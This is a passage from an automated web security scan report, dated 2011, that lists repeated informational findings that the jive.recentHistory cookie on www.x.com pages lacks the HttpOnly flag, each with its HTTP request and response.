Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.128. https://www.x.com/docs/DOC-3426

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.129. https://www.x.com/docs/DOC-3427

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.130. https://www.x.com/docs/DOC-3431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.131. https://www.x.com/docs/DOC-3443

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.132. https://www.x.com/docs/DOC-3444

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.133. https://www.x.com/docs/DOC-3491

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.134. https://www.x.com/docs/DOC-3561

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.135. https://www.x.com/docs/DOC-3562

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.136. https://www.x.com/docs/DOC-3619

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.137. https://www.x.com/docs/DOC-3688

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.138. https://www.x.com/docs/DOC-3811

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.139. https://www.x.com/docs/DOC-3812

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.140. https://www.x.com/docs/DOC-3836

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.141. https://www.x.com/docs/DOC-3841

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.142. https://www.x.com/message/186684

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34363935333b312c35333838343b312c34393435343b312c35343036353b312c35333937373b312c34373636333b312c35343035383b312c35333135383b312c35333137323b312c35333235323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.143. https://www.x.com/message/198017

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.144. https://www.x.com/message/211333

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.145. https://www.x.com/message/211439

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.146. https://www.x.com/message/211738

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.147. https://www.x.com/message/212001

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.148. https://www.x.com/message/212124

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
